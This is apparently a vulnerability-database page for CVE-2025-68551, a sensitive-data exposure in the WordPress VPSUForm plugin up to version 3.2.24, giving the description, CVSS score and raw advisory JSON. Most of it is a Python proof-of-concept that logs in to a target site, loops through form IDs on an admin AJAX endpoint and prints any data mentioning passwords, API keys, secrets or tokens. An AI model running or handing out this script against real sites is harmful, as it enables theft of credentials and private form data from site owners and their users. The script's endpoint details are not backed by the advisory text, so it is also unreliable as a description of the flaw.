Security Vulnerability Report
中文
CVE-2025-68551 CVSS 6.5 MEDIUM

CVE-2025-68551

Published: 2025-12-23 12:15:46
Last Modified: 2026-04-23 15:36:01

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Vikas Ratudi VPSUForm v-form allows Retrieve Embedded Sensitive Data.This issue affects VPSUForm: from n/a through <= 3.2.24.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

VPSUForm (v-form) <= 3.2.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-68551 PoC - VPSUForm Sensitive Information Disclosure Vulnerability in WordPress VPSUForm plugin <= 3.2.24 """ import requests import sys from urllib.parse import urljoin def exploit_vpsuform(target_url, username, password): """ Exploit VPSUForm sensitive information disclosure vulnerability """ session = requests.Session() # WordPress login login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f'[*] Attempting to login to {target_url}') response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print('[-] Login failed!') return False print('[+] Login successful!') # Enumerate form IDs to find sensitive data print('[*] Enumerating form IDs to extract sensitive data...') for form_id in range(1, 100): # Try to access form data via AJAX endpoint ajax_url = urljoin(target_url, '/wp-admin/admin-ajax.php') params = { 'action': 'vpsuform_get_form_data', 'form_id': form_id } try: response = session.get(ajax_url, params=params, timeout=10) if response.status_code == 200: data = response.json() if data.get('success') and 'data' in data: form_data = data['data'] # Check for sensitive information patterns sensitive_patterns = ['password', 'api_key', 'secret', 'token', 'credential'] for pattern in sensitive_patterns: if pattern.lower() in str(form_data).lower(): print(f'[+] Found sensitive data in form {form_id}:') print(f' {form_data}') if form_data: print(f'[+] Form {form_id} data retrieved: {form_data}') except Exception as e: continue return True if __name__ == '__main__': if len(sys.argv) < 4: print(f'Usage: python3 {sys.argv[0]} <target_url> <username> <password>') print(f'Example: python3 {sys.argv[0]} http://example.com admin password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_vpsuform(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68551", "sourceIdentifier": "[email protected]", "published": "2025-12-23T12:15:45.877", "lastModified": "2026-04-23T15:36:00.720", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Vikas Ratudi VPSUForm v-form allows Retrieve Embedded Sensitive Data.This issue affects VPSUForm: from n/a through <= 3.2.24."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/v-form/vulnerability/wordpress-vpsuform-plugin-3-2-24-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}